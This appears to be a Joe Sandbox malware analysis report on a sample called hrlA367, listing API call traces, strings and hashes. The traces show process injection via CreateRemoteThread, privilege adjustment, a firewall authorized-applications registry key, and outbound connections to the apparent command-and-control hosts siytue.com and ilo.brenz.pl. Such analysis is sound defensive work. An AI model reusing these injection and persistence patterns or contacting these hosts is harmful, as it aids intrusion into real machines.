Associated: 00000015.00000002.2064959905.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064992453.0000000000414000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065024303.000000000041A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065055495.000000000041B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065086646.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065117221.0000000000422000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065150592.0000000000429000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065181608.000000000042E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065213605.0000000000430000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065247297.0000000000436000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065278608.0000000000437000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065314228.000000000043C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065345921.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065376800.000000000043F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065412995.0000000000444000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065444222.0000000000445000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065477000.000000000044A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065510299.000000000044C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065543439.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065574043.0000000000453000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065609286.0000000000458000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065641477.000000000045A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065672358.000000000045B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065703455.0000000000460000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065733984.0000000000461000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065770490.0000000000466000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065800883.0000000000468000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065830355.0000000000469000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065861085.000000000046E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065891278.000000000046F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065923953.0000000000474000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065955831.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065987198.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2066018174.000000000047C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2066052063.000000000047D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2066082716.0000000000482000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_hrlA367.jbxd

Yara matches

Similarity

API ID: ErrorExceptionLastLibraryRaise$AddressAllocExchangeFreeInterlockedLoadLocalProc
String ID: $
API String ID: 991255547-3993045852
Opcode ID: 256256f5bea5ef9629b74784c89f9cd366c968008bba8740bb1e0df359706086
Instruction ID: 003abd56770ea85181eee10679b32b4024c484e765cb6dd7374dfc17ffc6279b
Opcode Fuzzy Hash: 256256f5bea5ef9629b74784c89f9cd366c968008bba8740bb1e0df359706086
Instruction Fuzzy Hash: C3612DB5B006059FDB24CF99C984AAABBF9AB48301B10403EE956F7391D774EE04CF14

Function 7FE332CF Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 98sleeplibraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,7FE332C3), ref: 7FE332D0
GetModuleFileNameA.KERNEL32(00000000,C:\Windows\sysWOW64\wbem\wmiprvse.exe,000000C8), ref: 7FE332E5
wsprintfA.USER32 ref: 7FE332FA
CreateThread.KERNEL32(00000000,00000000,7FE32C7D,00000000,00000000), ref: 7FE33343
CloseHandle.KERNEL32(?,0C1A4F68), ref: 7FE3334C
WSAStartup.WS2_32(00000101), ref: 7FE333D1
Sleep.KERNEL32(00001388,00000000,00000000), ref: 7FE333F3

Part of subcall function 7FE329F1: NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 7FE32A36
Part of subcall function 7FE329F1: NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 7FE32A55
Part of subcall function 7FE329F1: MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 7FE32A7F
Part of subcall function 7FE329F1: CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 7FE32A8C
Part of subcall function 7FE329F1: UnmapViewOfFile.KERNEL32(?), ref: 7FE32AA4

Strings

SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 7FE3330F
C:,, xrefs: 7FE332F9
C:\Windows\sysWOW64\wbem\wmiprvse.exe, xrefs: 7FE332E2, 7FE332F7

Memory Dump Source

Source File: 00000015.00000002.2066853464.000000007FE30000.00000040.80000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7fe30000_hrlA367.jbxd

Similarity

API ID: File$CloseHandleView$AddressCreateInformationModuleNameOpenProcQuerySectionSleepStartupSystemThreadUnmapwsprintf
String ID: C:,$C:\Windows\sysWOW64\wbem\wmiprvse.exe$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
API String ID: 3988882592-2190306782
Opcode ID: 5a2e8885b122901e0e527b3c98aa0eb90efe88ce56f4889f66029a75c3141c74
Instruction ID: 806d303376319e10b4faa7ba5eb60574f11820cef6a731847cf1d174f778dc29
Opcode Fuzzy Hash: 5a2e8885b122901e0e527b3c98aa0eb90efe88ce56f4889f66029a75c3141c74
Instruction Fuzzy Hash: 82319031904719FFDB619F61CC0EFEA362CDF41711F404219F96A6A080DAF06F05CAA6

Function 004020D3 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 98librarystringloaderCOMMON

Download Yara Rule

APIs

OpenMutexA.KERNEL32(001F0001,00000000,100200), ref: 004020DF
ReleaseMutex.KERNEL32(00000000), ref: 004020EC
CloseHandle.KERNEL32(00000000), ref: 004020F3
lstrcatA.KERNEL32(?,?), ref: 004021AC
GetProcAddress.KERNEL32(00000000,?), ref: 004021BF

Strings

stf%c%c%c%c%c.exe, xrefs: 0040218D
100200, xrefs: 004020D3, 00402279
<6@, xrefs: 00402193

Memory Dump Source

Source File: 00000015.00000002.2064830909.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.2064795062.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064865379.0000000000406000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064896028.0000000000408000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064927902.000000000040A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064959905.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064992453.0000000000414000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065024303.000000000041A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065055495.000000000041B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065086646.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065117221.0000000000422000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065150592.0000000000429000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065181608.000000000042E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065213605.0000000000430000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065247297.0000000000436000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065278608.0000000000437000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065314228.000000000043C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065345921.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065376800.000000000043F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065412995.0000000000444000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065444222.0000000000445000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065477000.000000000044A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065510299.000000000044C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065543439.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065574043.0000000000453000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065609286.0000000000458000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065641477.000000000045A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065672358.000000000045B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065703455.0000000000460000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065733984.0000000000461000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065770490.0000000000466000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065800883.0000000000468000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065830355.0000000000469000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065861085.000000000046E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065891278.000000000046F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065923953.0000000000474000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065955831.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065987198.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2066018174.000000000047C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2066052063.000000000047D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2066082716.0000000000482000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_hrlA367.jbxd

Yara matches

Similarity

API ID: Mutex$AddressCloseHandleOpenProcReleaselstrcat
String ID: 100200$<6@$stf%c%c%c%c%c.exe
API String ID: 2376757572-3190100693
Opcode ID: d112f5c9d013e11b3731d5647da893e1883a61e01d2132f2d5a6d2d8178d5850
Instruction ID: 7c7aac5ec1300530b19c54ce4657de090f08845e18d217751b06ad59df05bcf8
Opcode Fuzzy Hash: d112f5c9d013e11b3731d5647da893e1883a61e01d2132f2d5a6d2d8178d5850
Instruction Fuzzy Hash: B731EBF26443007BE760AB60DD0AFAF7668BB44706F00453DF746B61C1EDB49604866B

Function 0040348F Relevance: 16.6, APIs: 11, Instructions: 111COMMON

Download Yara Rule

APIs

__set_app_type.MSVCRT ref: 004034BC
__p__fmode.MSVCRT ref: 004034D1
__p__commode.MSVCRT ref: 004034DF
__setusermatherr.MSVCRT ref: 0040350B
_initterm.MSVCRT ref: 00403521
__getmainargs.MSVCRT ref: 00403544
_initterm.MSVCRT ref: 00403554
GetStartupInfoA.KERNEL32(?), ref: 00403593
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 004035B7
exit.MSVCRT ref: 004035C7
_XcptFilter.MSVCRT ref: 004035D9

Memory Dump Source

Source File: 00000015.00000002.2064830909.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.2064795062.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064865379.0000000000406000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064896028.0000000000408000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064927902.000000000040A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064959905.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064992453.0000000000414000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065024303.000000000041A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065055495.000000000041B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065086646.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065117221.0000000000422000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065150592.0000000000429000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065181608.000000000042E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065213605.0000000000430000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065247297.0000000000436000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065278608.0000000000437000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065314228.000000000043C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065345921.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065376800.000000000043F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065412995.0000000000444000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065444222.0000000000445000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065477000.000000000044A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065510299.000000000044C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065543439.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065574043.0000000000453000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065609286.0000000000458000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065641477.000000000045A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065672358.000000000045B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065703455.0000000000460000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065733984.0000000000461000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065770490.0000000000466000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065800883.0000000000468000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065830355.0000000000469000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065861085.000000000046E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065891278.000000000046F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065923953.0000000000474000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065955831.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065987198.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2066018174.000000000047C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2066052063.000000000047D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2066082716.0000000000482000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_hrlA367.jbxd

Yara matches

Similarity

API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
String ID:
API String ID: 801014965-0
Opcode ID: e284ab8ee17c914b7e9ddb28410b1748839fce9069ce7daa9396d3e96ef4b395
Instruction ID: dc900e3830a3569765129a6993a161ee3a7e101abcc0f586eb7ca925653150ca
Opcode Fuzzy Hash: e284ab8ee17c914b7e9ddb28410b1748839fce9069ce7daa9396d3e96ef4b395
Instruction Fuzzy Hash: 9C414AB1840304AFDB209FA4DD45AAA7FACEB09711F20057EE842B72E1D7785A41CF68

Function 0062388E Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 127networksleeptimeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(00627584), ref: 0062389F
Sleep.KERNEL32(0000EA60), ref: 00623911
gethostbyname.WS2_32(0D278125), ref: 0062396C
socket.WS2_32(00000002,00000001,00000000), ref: 00623981
ioctlsocket.WS2_32(?,8004667E), ref: 0062399A
connect.WS2_32(?,?,00000010), ref: 006239B3
Sleep.KERNEL32(?,00000010,BB010002,00000000,8004667E,?,00000001), ref: 006239C1
closesocket.WS2_32 ref: 00623A20

Strings

siytue.com, xrefs: 006238F1

Memory Dump Source

Source File: 00000015.00000002.2066207224.0000000000620000.00000040.10000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_620000_hrlA367.jbxd

Yara matches

Similarity

API ID: Sleep$SystemTimeclosesocketconnectgethostbynameioctlsocketsocket
String ID: siytue.com
API String ID: 2474828227-1949023271
Opcode ID: b9cbcd502034ca6391bc477693aeae1c9470f5e239758c46d06d44a479c792e4
Instruction ID: 38a217eff2ed79baba2bbb5fe916a7b752407042e9a19a4617fdf54229fef8c7
Opcode Fuzzy Hash: b9cbcd502034ca6391bc477693aeae1c9470f5e239758c46d06d44a479c792e4
Instruction Fuzzy Hash: A341B131604669BAEB319E249C4EBE97B9FAF85710F044029F949DE2C1D7F99F418B20

Function 7FE307B5 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 62processthreadinjectionCOMMON

Download Yara Rule

APIs

Part of subcall function 7FE313C1: LookupPrivilegeValueA.ADVAPI32(00000000,?), ref: 7FE313D1
Part of subcall function 7FE313C1: NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000), ref: 7FE313E1

CloseHandle.KERNEL32(?), ref: 7FE305BC
FreeLibrary.KERNEL32(76DA0000,?,7FE307A4,00000000,000065A4,00000000,?,00000002,00000000,00000040,00000000,000065A4), ref: 7FE307C1
CloseHandle.KERNEL32(?,?,7FE307A4,00000000,000065A4,00000000,?,00000002,00000000,00000040,00000000,000065A4), ref: 7FE307C8
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,000065A4,00000000,?,00000002,00000000,00000040,00000000,000065A4), ref: 7FE307D2
Process32First.KERNEL32 ref: 7FE307E5
Process32Next.KERNEL32 ref: 7FE307F6
OpenProcess.KERNEL32(0000002A,00000000,?,?,?,?,?,?,00000002,00000000,00000040,00000000,000065A4), ref: 7FE3080E
CreateRemoteThread.KERNEL32(?,00000000,00000000,-00002FC3,00000002,00000000), ref: 7FE3084B
CloseHandle.KERNEL32(?,?,?,?,?,?,00000002,00000000,00000040,00000000,000065A4), ref: 7FE30866
CloseHandle.KERNEL32 ref: 7FE30875

Strings

csrs, xrefs: 7FE30835

Memory Dump Source

Source File: 00000015.00000002.2066853464.000000007FE30000.00000040.80000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7fe30000_hrlA367.jbxd

Similarity

API ID: CloseHandle$CreateProcess32$AdjustFirstFreeLibraryLookupNextOpenPrivilegePrivilegesProcessRemoteSnapshotThreadTokenToolhelp32Value
String ID: csrs
API String ID: 3908997113-2321902090
Opcode ID: 7a0311b27d1f69206ae28c9acee774715fd69c7f810f3bbf34c027bcac111cc0
Instruction ID: eba08b2346753bb0dc32dc5381f4741ba834f7a00a5bae23cd1368a28801996b
Opcode Fuzzy Hash: 7a0311b27d1f69206ae28c9acee774715fd69c7f810f3bbf34c027bcac111cc0
Instruction Fuzzy Hash: 6D119830A0A215FBEB255F21CC4DBBE3A7DDF44745F510028FA4799080DBB0DB41C6A6

Function 004224AC Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 62processthreadinjectionCOMMON

Download Yara Rule

APIs

Part of subcall function 0042314A: NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000,?,00000001,00000000,00000000,00000002), ref: 0042316A

CloseHandle.KERNEL32(?), ref: 004222AD
FreeLibrary.KERNEL32(000000D7,?,0042249B,00000000,000077C4,00000000,?,00000002,00000000,00000040,00000000,000077C4), ref: 004224B8
CloseHandle.KERNEL32(?,?,0042249B,00000000,000077C4,00000000,?,00000002,00000000,00000040,00000000,000077C4), ref: 004224BF
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,000077C4,00000000,?,00000002,00000000,00000040,00000000,000077C4), ref: 004224C9
Process32First.KERNEL32 ref: 004224DC
Process32Next.KERNEL32 ref: 004224ED
OpenProcess.KERNEL32(0000002A,00000000,?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 00422505
CreateRemoteThread.KERNEL32(?,00000000,00000000,-00003C38,00000002,00000000), ref: 00422542
CloseHandle.KERNEL32(?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 0042255D
CloseHandle.KERNEL32 ref: 0042256C

Strings

csrs, xrefs: 0042252C

Memory Dump Source

Source File: 00000015.00000002.2065117221.0000000000422000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.2064795062.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064830909.0000000000401000.00000020.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064865379.0000000000406000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064896028.0000000000408000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064927902.000000000040A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064959905.0000000000411000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2064992453.0000000000414000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065024303.000000000041A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065055495.000000000041B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065086646.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065150592.0000000000429000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065181608.000000000042E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065213605.0000000000430000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065247297.0000000000436000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065278608.0000000000437000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065314228.000000000043C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065345921.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065376800.000000000043F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065412995.0000000000444000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065444222.0000000000445000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065477000.000000000044A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065510299.000000000044C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065543439.0000000000452000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065574043.0000000000453000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065609286.0000000000458000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065641477.000000000045A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065672358.000000000045B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065703455.0000000000460000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065733984.0000000000461000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065770490.0000000000466000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065800883.0000000000468000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065830355.0000000000469000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065861085.000000000046E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065891278.000000000046F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065923953.0000000000474000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065955831.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2065987198.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2066018174.000000000047C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2066052063.000000000047D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.2066082716.0000000000482000.00000040.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_hrlA367.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateProcess32$AdjustFirstFreeLibraryNextOpenPrivilegesProcessRemoteSnapshotThreadTokenToolhelp32
String ID: csrs
API String ID: 931541398-2321902090
Opcode ID: 214ed8d877d5af5bdcbfeb92dfaf8d9be1786541dc830f75d8708442990ea625
Instruction ID: f64974346249c8fb2975e722d3b3f91fbe0a72320cd7a4aec69f7db5720a1b4d
Opcode Fuzzy Hash: 214ed8d877d5af5bdcbfeb92dfaf8d9be1786541dc830f75d8708442990ea625
Instruction Fuzzy Hash: 78116030600125BBFB256F21DE49BBF3A6DEF44742F40406EFD4A99181C6B88F519A6E

Function 7FE33565 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 84sleepnetworkstringCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00001388,00000000,00000000), ref: 7FE333F3
gethostbyname.WS2_32(ilo.brenz.pl), ref: 7FE33412
lstrlen.KERNEL32(ilo.brenz.pl), ref: 7FE3341D
socket.WS2_32(00000002,00000001,00000000), ref: 7FE33453
connect.WS2_32(?,7FE32EB6,00000010), ref: 7FE3346D
GetVersionExA.KERNEL32(?,?,7FE32EB6,00000010), ref: 7FE334B7
wsprintfA.USER32 ref: 7FE33566
Sleep.KERNEL32(00000064,?,?,C:\Windows\sysWOW64\wbem\wmiprvse.exe,7FE36125,00000000,?,C:\Windows\sysWOW64\wbem\wmiprvse.exe,00000000,?,?,00000000), ref: 7FE33612
GetTickCount.KERNEL32 ref: 7FE3361B
closesocket.WS2_32 ref: 7FE3363F
Sleep.KERNEL32(00007530), ref: 7FE33653

Strings

C:\Windows\sysWOW64\wbem\wmiprvse.exe, xrefs: 7FE33565, 7FE33570, 7FE33590

Memory Dump Source

Source File: 00000015.00000002.2066853464.000000007FE30000.00000040.80000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7fe30000_hrlA367.jbxd

Similarity

API ID: Sleep$CountTickVersionclosesocketconnectgethostbynamelstrlensocketwsprintf
String ID: C:\Windows\sysWOW64\wbem\wmiprvse.exe
API String ID: 2598339483-2345302899
Opcode ID: d8d5e14ce8bde0a1c939d63ec7781a2c4ff1cbe07d4ef513ca2b050a836d98cc
Instruction ID: d85bbd76be20f0a00c0cc1f3b58fd3048d72df3a51a8d270456399880643c19b
Opcode Fuzzy Hash: d8d5e14ce8bde0a1c939d63ec7781a2c4ff1cbe07d4ef513ca2b050a836d98cc
Instruction Fuzzy Hash: AC219171A04355BFEB259F24880DFAE3A7EEF41616F900504E80A9E194CBF0AB01DBA5

Function 7FE332B8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 116libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(7FE332AC), ref: 7FE332B8

Part of subcall function 7FE332CF: GetProcAddress.KERNEL32(00000000,7FE332C3), ref: 7FE332D0
